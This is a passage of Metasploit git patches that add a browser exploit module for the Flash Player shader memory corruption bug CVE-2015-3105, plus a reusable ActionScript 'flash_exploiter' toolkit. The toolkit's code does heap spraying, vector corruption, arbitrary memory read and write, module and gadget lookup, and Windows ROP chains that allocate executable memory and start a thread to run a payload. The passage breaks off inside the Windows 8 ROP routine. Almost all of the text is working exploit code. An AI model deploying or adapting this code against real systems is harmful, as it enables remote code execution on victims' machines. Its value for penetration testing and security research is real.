+                var entry:uint = eba.read(iat + (++i) * 0x14 + 12)
+                if (!entry) throw new Error("FAIL!"); 
+                mod_name = eba.read_string(addr + entry, name.length)
+                if (mod_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return base(eba.read(addr + eba.read(iat + i * 0x14 + 16)))
+        }
+
+        public function procedure(name:String, addr:uint):uint
+        {
+            var eat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x78)
+            var numberOfNames:uint = eba.read(eat + 0x18)
+            var addressOfFunctions:uint = addr + eba.read(eat + 0x1c)
+            var addressOfNames:uint = addr + eba.read(eat + 0x20)
+            var addressOfNameOrdinals:uint = addr + eba.read(eat + 0x24)
+            var proc_name:String
+
+            for (var i:uint = 0; ; i++) {
+                var entry:uint = eba.read(addressOfNames + i * 4)
+                proc_name = eba.read_string(addr + entry, name.length + 2)
+                if (proc_name.toUpperCase() == name.toUpperCase()) break
+            }
+            return addr + eba.read(addressOfFunctions + eba.read(addressOfNameOrdinals + i * 2, "word") * 4)
+        }
+
+        public function gadget(gadget:String, hint:uint, addr:uint):uint
+        {
+            var find:uint = 0
+            var contents:uint = 0
+            var limit:uint = eba.read(addr + eba.read(addr + 0x3c) + 0x50)
+            var value:uint = parseInt(gadget, 16)
+
+            for (var i:uint = 0; i < limit - 4; i++) {
+                contents = eba.read(addr + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return addr + i
+                }
+                if (hint != 0xffffffff && value == (contents & hint)) {
+                    return addr + i
+                }
+            }
+            throw new Error()
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2015-3105/pbsrc_bin.pbj b/external/source/exploits/CVE-2015-3105/pbsrc_bin.pbj
new file mode 100755
index 0000000000000000000000000000000000000000..a2e85456c920211dc74cbb8655946a06804eb32b
GIT binary patch
literal 7415
zcmd^^L2DCH5Xa{wX;L9#4m}iXU=Ka?&_f!drcf|~1qBs_Dhdj&*-f))b`y5f;&DGp
z6ZCs{@%sq9dGbGRpHkM&A$XiXnEdBIZ{Fm08hGCf5q;gD`R6PhUN#dy4zsyG4C$r)
z&}H)?OoCbZS8rZ~X%@{AGVp>h8>Z2G!P*^Ing&sAKFcD`o}_+~jb>@=+nQA)j*_?j
z^gN^=zi@HsvrZ1J{4YhT;~QG7lUp@{aO9s)7e%{AInn=oL7*lP=#mx$n-YS1Y7jIf
z1U)qfS`vc$Y7lHm2p*_Guq`2Ys0P7~grKhmfhQq2RD)nwLU7Pg!(dNjaG-|4zQ{n&
zg4hum=-Ci^A_F}uVqavSXGc5|8R%IO2O<MKTjCRufu1$-smMUjp7>m1(ABdiz7iSe
z*%MDh2730ycOnBld*TO?fu23_lgL2Lo>&j4dh^Rl7kgq|d|N5MtFT77^nOx)J7K-5
zul+`{G$tS;%!{4Q{L^t+sh!fDAX`v7q*g%RsfzfR2Gkx=D`bs$%o_QT^PiRc7bXAo
zHJ{IIKy%-H&W|a#eGxnE+!(J??Dw31i|gU<6?(w+l`##tj{D&!8N^*z&%QzZZPwN&
zsvx#XzIV;%Io?3?J@1P;+aG%H(VgRa*!N3*=zQjZxpJ;UzhXY<KmX6=Jp&(go}EA9
z`kdMk*V~A^jrd<Vbtm+b-@+;rx{By7wa@6vAXX74tfx*RvTu-|avq0|a1YPB#hl!I
r&|cro%l&!Y?Lymmz|GrXz3yDN|BUBCv~$I7E<`&Q@-feKTFmzw={9gJ

literal 0
HcmV?d00001

diff --git a/external/source/exploits/CVE-2015-3105/test_bin.pbj b/external/source/exploits/CVE-2015-3105/test_bin.pbj
new file mode 100755
index 0000000000000000000000000000000000000000..7d1b65af5d4683e966db77adcb129f02f1c1ff6b
GIT binary patch
literal 985
zcmbV}&1%9x6opSF6BB<x_eGGtfwubwq}z7aZ3!j?K@&-$l&<n9D($ALK7zhc!ChB9
zcP5~8Q*<CXo-_A;b0>Z{0Nypqq$t;&G@2*HBAO(4IAdYmStV(l<^OeI9jubPm}V&)
zHpNLX$)}4_{5i*M90hcqAD87g%kmf-M?2_FvRRf7X}IYwvT0h5uvPPE`V`HU32$i^
zqv+K}_iunaTNNiS(Q;NEE5|<&l0wIjhL@A%R70{e-CRyGGb!z&8y6+|8hhXiimK2P
zKh##~PjU}?lQ&R#2r<&AWG41i8awnG2sQm_?$I+JNKWlZ3;C?C;PNFL`cUfV*}p^I
zv-Qd-_X8X}d_w!sfz(kOmd6P7{JrD+o}K^N!>y^~y*%E7Tyw9H&%?Q>;T?aG&p9fz
zsD|fbAm`Y8cbfO=d?1Ks0IHd<Vyo2C?@sg3<UBu+@5v@DTsGA@sFmM^^91;oc@*#K
z;|l#I4i43&2I5<_r^>#=yd}Beat^~aO0H3I`9J;TvcD-@s^PY4F4b_Ew}tCk{x6C6
BvX=k=

literal 0
HcmV?d00001

diff --git a/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb b/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb
new file mode 100644
index 0000000000..0de86549e6
--- /dev/null
+++ b/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb
@@ -0,0 +1,146 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'                => 'Adobe Flash Player Drawing Fill Shader Memory Corruption',
+      'Description'         => %q{
+        This module exploits a memory corruption happening when applying a Shader as a drawing fill
+        as exploited in the wild on June 2015. This module has been tested successfully on:
+        Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188.
+        Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188.
+        Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188.
+        Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.460.
+      },
+      'License'             => MSF_LICENSE,
+      'Author'              =>
+        [
+          'Chris Evans', # Vulnerability discovery
+          'Unknown', # Exploit in the wild
+          'juan vazquez' # msf module
+        ],
+      'References'          =>
+        [
+          ['CVE', '2015-3105'],
+          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-11.html'],
+          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/magnitude-exploit-kit-uses-newly-patched-adobe-vulnerability-us-canada-and-uk-are-most-at-risk/'],
+          ['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3105-flash-up-to-1700188-and.html'],
+          ['URL', 'http://help.adobe.com/en_US/as3/dev/WSFDA04BAE-F6BC-43d9-BD9C-08D39CA22086.html']
+        ],
+      'Payload'             =>
+        {
+          'DisableNops' => true
+        },
+      'Platform'            => ['win', 'linux'],
+      'Arch'                => [ARCH_X86],
+      'BrowserRequirements' =>
+        {
+          :source  => /script|headers/i,
+          :arch    => ARCH_X86,
+          :os_name => lambda do |os|
+            os =~ OperatingSystems::Match::LINUX ||
+              os =~ OperatingSystems::Match::WINDOWS_7 ||
+              os =~ OperatingSystems::Match::WINDOWS_81
+          end,
+          :ua_name => lambda do |ua|
+            case target.name
+            when 'Windows'
+              return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
+            when 'Linux'
+              return true if ua == Msf::HttpClients::FF
+            end
+
+            false
+          end,
+          :flash   => lambda do |ver|
+            case target.name
+            when 'Windows'
+              return true if ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.188')
+            when 'Linux'
+              return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.460')
+            end
+
+            false
+          end
+        },
+      'Targets'             =>
+        [
+          [ 'Windows',
+            {
+              'Platform' => 'win'
+            }
+          ],
+          [ 'Linux',
+            {
+              'Platform' => 'linux'
+            }
+          ]
+        ],
+      'Privileged'          => false,
+      'DisclosureDate'      => 'May 12 2015',
+      'DefaultTarget'       => 0))
+  end
+
+  def exploit
+    @swf = create_swf
+
+    super
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_status("Request: #{request.uri}")
+
+    if request.uri =~ /\.swf$/
+      print_status('Sending SWF...')
+      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
+      return
+    end
+
+    print_status('Sending HTML...')
+    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
+  end
+
+  def exploit_template(cli, target_info)
+    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+    target_payload = get_payload(cli, target_info)
+    b64_payload = Rex::Text.encode_base64(target_payload)
+    os_name = target_info[:os_name]
+
+    if target.name =~ /Windows/
+      platform_id = 'win'
+    elsif target.name =~ /Linux/
+      platform_id = 'linux'
+    end
+
+    html_template = %Q|<html>
+    <body>
+    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
+    <param name="movie" value="<%=swf_random%>" />
+    <param name="allowScriptAccess" value="always" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
+    <param name="Play" value="true" />
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
+    </object>
+    </body>
+    </html>
+    |
+
+    return html_template, binding()
+  end
+
+  def create_swf
+    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3105', 'msf.swf')
+    swf =  ::File.open(path, 'rb') { |f| swf = f.read }
+
+    swf
+  end
+end

From a87d4e5764d51cc1b3a8df1038cd9d4d93fd9c4e Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 25 Jun 2015 13:52:57 -0500
Subject: [PATCH 0563/1013] Add flash_exploiter template

---
 external/source/flash_exploiter/Elf.as        | 235 +++++++++++
 external/source/flash_exploiter/Exploit.as    |  48 +++
 .../flash_exploiter/ExploitByteArray.as       |  85 ++++
 .../source/flash_exploiter/ExploitVector.as   |  75 ++++
 external/source/flash_exploiter/Exploiter.as  | 399 ++++++++++++++++++
 external/source/flash_exploiter/Logger.as     |  32 ++
 external/source/flash_exploiter/PE.as         |  72 ++++
 7 files changed, 946 insertions(+)
 create mode 100644 external/source/flash_exploiter/Elf.as
 create mode 100755 external/source/flash_exploiter/Exploit.as
 create mode 100644 external/source/flash_exploiter/ExploitByteArray.as
 create mode 100644 external/source/flash_exploiter/ExploitVector.as
 create mode 100644 external/source/flash_exploiter/Exploiter.as
 create mode 100644 external/source/flash_exploiter/Logger.as
 create mode 100644 external/source/flash_exploiter/PE.as

diff --git a/external/source/flash_exploiter/Elf.as b/external/source/flash_exploiter/Elf.as
new file mode 100644
index 0000000000..ee7283c61c
--- /dev/null
+++ b/external/source/flash_exploiter/Elf.as
@@ -0,0 +1,235 @@
+package
+{
+    public class Elf
+    {
+        private const PT_DYNAMIC:uint = 2
+        private const PT_LOAD:uint = 1 
+        private const PT_READ_EXEC:uint = 5
+        private const DT_SYMTAB:uint = 6
+        private const DT_STRTAB:uint = 5
+        private const DT_PLTGOT:uint = 3
+
+        private var e_ba:ExploitByteArray
+        // elf base address
+        public var base:uint = 0
+        // program header address
+        public var ph:uint = 0
+        // number of program headers
+        public var ph_size:uint = 0
+        // program header entry size
+        public var ph_esize:uint = 0
+        // DYNAMIC segment address
+        public var seg_dynamic:uint = 0
+        // DYNAMIC segment size
+        public var seg_dynamic_size:uint = 0
+        // CODE segment address
+        public var seg_exec:uint = 0
+        // CODE segment size
+        public var seg_exec_size:uint = 0
+        // .dynsyn section address
+        public var sec_dynsym:uint = 0
+        // .synstr section address
+        public var sec_dynstr:uint = 0
+        // .got.plt section address
+        public var sec_got_plt:uint = 0
+         
+        public function Elf(ba:ExploitByteArray, addr:uint) 
+        {
+            e_ba = ba
+            set_base(addr)
+            set_program_header()
+            set_program_header_size()
+            set_program_header_entry_size()
+            set_dynamic_segment()
+            set_exec_segment()
+            set_dynsym()
+            set_dynstr()
+            set_got_plt()
+        }
+
+        public function external_symbol(name:String):uint {
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+            var got_plt_index:uint = 0
+
+            for(var i:uint = 0; i < 1000; i++) { // 1000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return e_ba.read(sec_got_plt + 0xc + (got_plt_index * 4))
+                }
+                if (st_info != 0x11) {
+                    got_plt_index++
+                }
+            }
+            throw new Error()  
+        }
+
+        public function symbol(name:String):uint {           
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+
+            for(var i:uint = 0; i < 3000; i++) { // 3000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return base + st_value
+                }
+            }
+            throw new Error()  
+        }
+
+
+        public function gadget(gadget:String, hint:uint):uint
+        {
+            var value:uint = parseInt(gadget, 16)
+            var contents:uint = 0
+            for (var i:uint = 0; i < seg_exec_size - 4; i++) {
+                contents = e_ba.read(seg_exec + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return seg_exec + i
+                } 
+                if (hint != 0xffffffff && value == (contents & hint)) { 
+                    return seg_exec + i
+                }
+            }
+            throw new Error()
+        } 
+ 
+        private function set_base(addr:uint):void
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (e_ba.read(addr) == 0x464c457f) {
+                    base = addr
+                    return
+                }
+                addr -= 0x1000
+            }
+            
+            throw new Error()
+        }  
+ 
+        private function set_program_header():void
+        {
+            ph = base + e_ba.read(base + 0x1c)
+        }
+    
+        private function set_program_header_size():void
+        {
+            ph_size = e_ba.read(base + 0x2c, "word")
+        } 
+
+        private function set_program_header_entry_size():void
+        {
+            ph_esize = e_ba.read(base + 0x2a, "word")
+        }
+    
+        private function set_dynamic_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                if (p_type == PT_DYNAMIC) {
+                    seg_dynamic = base + e_ba.read(entry + 8)
+                    seg_dynamic_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+
+            throw new Error()
+        }
+
+        private function set_exec_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+            var p_flags:uint = 0
+            
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                p_flags = e_ba.read(entry + 0x18)
+                if (p_type == PT_LOAD && (p_flags & PT_READ_EXEC) == PT_READ_EXEC) {
+                    seg_exec = base + e_ba.read(entry + 8)
+                    seg_exec_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+ 
+        private function set_dynsym():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_SYMTAB) {
+                    sec_dynsym = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_dynstr():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_STRTAB) {
+                    sec_dynstr = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_got_plt():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_PLTGOT) {
+                    sec_got_plt = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+    }
+}
diff --git a/external/source/flash_exploiter/Exploit.as b/external/source/flash_exploiter/Exploit.as
new file mode 100755
index 0000000000..f0aa9102da
--- /dev/null
+++ b/external/source/flash_exploiter/Exploit.as
@@ -0,0 +1,48 @@
+/* 
+Code to assist the creation of exploits for the trend of Flash vulnerabilities used in the wild along 2014/2015.
+
+It uses some ideas and code included on @hdarwin89 proof of concepts.
+
+* How to build:
+    1. Download the AIRSDK, and use its compiler.
+    2. Download the Flex SDK (4.6)
+    3. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
+        (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
+    4. Build with: mxmlc -o msf.swf Exploit.as
+
+*/
+
+package
+{
+    import flash.display.Sprite
+    import flash.display.LoaderInfo
+    import mx.utils.Base64Decoder
+    import flash.utils.ByteArray
+
+    public class Exploit extends Sprite
+	{
+		private var uv:Vector.<uint>
+        private var b64:Base64Decoder = new Base64Decoder()
+        private var payload:ByteArray
+        private var platform:String
+        private var os:String
+        private var exploiter:Exploiter
+                
+        public function Exploit()
+        {
+            platform = LoaderInfo(this.root.loaderInfo).parameters.pl
+            os = LoaderInfo(this.root.loaderInfo).parameters.os
+            var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+            var pattern:RegExp = / /g;
+            b64_payload = b64_payload.replace(pattern, "+")
+            b64.decode(b64_payload)
+            payload = b64.toByteArray()
+              
+            /* 
+                The exploit code here. The goal is to corrupt the uv vector length with 0x3fffffff or bigger.
+            */
+            
+            exploiter = new Exploiter(this, platform, os, payload, uv, 0x13e)
+        }
+    }
+}
diff --git a/external/source/flash_exploiter/ExploitByteArray.as b/external/source/flash_exploiter/ExploitByteArray.as
new file mode 100644
index 0000000000..a8da46df7b
--- /dev/null
+++ b/external/source/flash_exploiter/ExploitByteArray.as
@@ -0,0 +1,85 @@
+package
+{
+    import flash.utils.ByteArray
+    
+    public class ExploitByteArray
+    {
+        private const MAX_STRING_LENGTH:uint = 100
+        public var ba:ByteArray
+        public var original_length:uint
+        private var platform:String
+
+        public function ExploitByteArray(p:String, l:uint = 1024)
+        {
+            ba = new ByteArray()
+            ba.length = l
+            ba.endian = "littleEndian"
+            ba.writeUnsignedInt(0)
+            platform = p
+            original_length = l
+        }
+
+        public function set_length(length:uint):void
+        {
+            ba.length = length
+        }
+
+        public function get_length():uint
+        {
+            return ba.length
+        }
+
+        public function lets_ready():void
+        {
+            ba.endian = "littleEndian"
+            if (platform == "linux") {
+                ba.length = 0xffffffff
+            } 
+        }
+
+        public function is_ready():Boolean
+        {
+            if (ba.length == 0xffffffff)
+                return true
+
+            return false
+        }
+
+        public function read(addr:uint, type:String = "dword"):uint
+        {
+            ba.position = addr
+            switch(type) {
+                case "dword": 
+                    return ba.readUnsignedInt()
+                case "word":
+                    return ba.readUnsignedShort()
+                case "byte":
+                    return ba.readUnsignedByte()
+            }
+            return 0
+        }
+
+        public function read_string(addr:uint, length:uint = 0):String
+        {
+            ba.position = addr
+            if (length == 0)
+                return ba.readUTFBytes(MAX_STRING_LENGTH)
+            else
+                return ba.readUTFBytes(length) 
+        }
+
+        public function write(addr:uint, value:* = 0, zero:Boolean = true):void
+        {
+            var i:uint
+
+            if (addr) ba.position = addr
+            if (value is String) {
+                for (i = 0; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
+                if (zero) ba.writeByte(0)
+            } else if (value is ByteArray) {
+                var value_length:uint = value.length
+                for (i = 0; i < value_length; i++) ba.writeByte(value.readByte())
+            } else ba.writeUnsignedInt(value)
+        }
+    }
+}
diff --git a/external/source/flash_exploiter/ExploitVector.as b/external/source/flash_exploiter/ExploitVector.as
new file mode 100644
index 0000000000..18aa4778a0
--- /dev/null
+++ b/external/source/flash_exploiter/ExploitVector.as
@@ -0,0 +1,75 @@
+package
+{
+    public class ExploitVector
+    {
+        private var uv:Vector.<uint>
+        public var original_length:uint 
+        
+        public function ExploitVector(v:Vector.<uint>, length:uint)
+        {
+            uv = v
+            original_length = length
+        }
+
+        public function restore():void
+        {
+            uv[0x3ffffffe] = original_length
+        }
+
+        public function is_ready():Boolean
+        {
+            if (uv.length > original_length) 
+            {
+                return true
+            }
+            return false
+        } 
+        
+        public function at(pos:uint):uint
+        {
+            return uv[pos]
+        }
+
+        // pos: position where a Vector.<Object>[0] lives
+        public function set_own_address(pos:uint):void
+        {
+            uv[0] = uv[pos - 5] - ((pos - 5) * 4) - 0xc
+        }
+
+        public function read(addr:uint):uint
+        {
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            return uv[pos]
+        }
+
+        public function write(addr:uint, value:uint = 0):void
+        {           
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            uv[pos] = value
+        }
+
+        public function search_pattern(pattern:uint, limit:uint):uint
+        {
+            for (var i:uint = 0; i < limit/4; i++) {
+                if (uv[i] == pattern) {
+                    return i
+                }
+            }
+            throw new Error() 
+        }
+    }
+}
diff --git a/external/source/flash_exploiter/Exploiter.as b/external/source/flash_exploiter/Exploiter.as
new file mode 100644
index 0000000000..ecbf56fac5
--- /dev/null
+++ b/external/source/flash_exploiter/Exploiter.as
@@ -0,0 +1,399 @@
+package
+{ 
+    import flash.utils.ByteArray
+    import flash.system.System
+
+    public class Exploiter
+    {
+        private const VECTOR_OBJECTS_LENGTH:uint = 1014
+        private var exploit:Exploit
+        private var ev:ExploitVector
+        private var eba:ExploitByteArray
+        private var payload:ByteArray
+        private var platform:String
+        private var op_system:String
+        private var pos:uint
+        private var byte_array_object:uint
+        private var main:uint
+        private var stack_object:uint
+        private var payload_space_object:uint
+        private var buffer_object:uint
+        private var buffer:uint
+        private var vtable:uint
+        private var stack_address:uint
+        private var payload_address:uint 
+        private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
+        private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
+        private var spray:Vector.<Object> = new Vector.<Object>(90000)
+
+        public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>, uv_length:uint):void
+        {
+            exploit = exp
+            payload = p
+            platform = pl
+            op_system = os
+
+            ev = new ExploitVector(uv, uv_length)
+            if (!ev.is_ready()) return
+            eba = new ExploitByteArray(platform)
+            spray_objects()
+            try { pos = search_objects() } catch (err:Error) { ev.restore(); cleanup(); return; }
+            ev.set_own_address(pos)
+            if (!disclose_objects()) { ev.restore(); cleanup(); return; }
+            disclose_addresses()
+            corrupt_byte_array()
+            if (!eba.is_ready()) { ev.restore(); cleanup(); return }
+            do_rop()
+            restore_byte_array()
+            ev.restore()
+            cleanup()
+        }
+
+        private function spray_objects():void
+        {
+            Logger.log("[*] Exploiter - spray_objects()")
+            for (var i:uint = 0; i < spray.length; i++) 
+            {
+                spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
+                spray[i][0] = eba.ba
+                spray[i][1] = exploit 
+                spray[i][2] = stack
+                spray[i][3] = payload_space
+            } 
+        }
+        
+        private function search_objects():uint
+        {
+            Logger.log("[*] Exploiter - search_objects()")
+            var idx:uint = ev.search_pattern(VECTOR_OBJECTS_LENGTH, 0xac100)
+            return idx + 1
+        }
+
+        private function disclose_objects():Boolean
+        { 
+            Logger.log("[*] Exploiter - disclose_objects()")
+            byte_array_object = ev.at(pos) - 1
+            main = ev.at(pos + 1) - 1
+            stack_object = ev.at(pos + 2) - 1
+            payload_space_object = ev.at(pos + 3) - 1
+            if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
+                return false
+            }
+            return true
+        }
+
+        private function disclose_addresses():void
+        {
+            Logger.log("[*] Exploiter - disclose_addresses()")
+            if (platform == "linux") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x10)
+                buffer = ev.read(buffer_object + 0x1c)
+            }    
+            else if (platform == "win") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x40)
+                buffer = ev.read(buffer_object + 8)
+            }
+            vtable = ev.read(main)
+            stack_address = ev.read(stack_object + 0x18)
+            payload_address = ev.read(payload_space_object + 0x18)
+        }
+        
+        private function corrupt_byte_array():void
+        {
+            Logger.log("[*] Exploiter - corrupt_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c) // *array
+                ev.write(buffer_object + 0x20, 0xffffffff) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8) // *array
+                ev.write(buffer_object + 16, 0xffffffff) // capacity
+            }
+            eba.lets_ready()
+        }
+
+        private function restore_byte_array():void
+        { 
+            Logger.log("[*] Exploiter - restore_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c, buffer) // *array
+                ev.write(buffer_object + 0x20, 1024) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8, buffer) // *array
+                ev.write(buffer_object + 16, 1024) // capacity
+            }
+            eba.set_length(eba.original_length) 
+        }
+        
+        private function do_rop():void
+        {
+            Logger.log("[*] Exploiter - do_rop()")
+            if (platform == "linux") {
+                do_rop_linux()
+            } else if (platform == "win") {
+                if (op_system == "Windows 8.1") {
+                    do_rop_windows8()
+                } else if (op_system == "Windows 7") {
+                    do_rop_windows()
+                } else {
+                    return
+                }
+            } else {
+                return
+            }
+        }
+
+        private function do_rop_windows():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var kernel32:uint = pe.module("kernel32.dll", winmm)            
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
+            var createthread:uint = pe.procedure("CreateThread", kernel32)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+           
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
+        private function do_rop_windows8():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows8()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var advapi32:uint = pe.module("advapi32.dll", flash)
+            var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
+            var kernel32:uint = pe.module("kernel32.dll", winmm) 
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
+            var createthread:uint = pe.procedure("CreateThread", kernelbase)
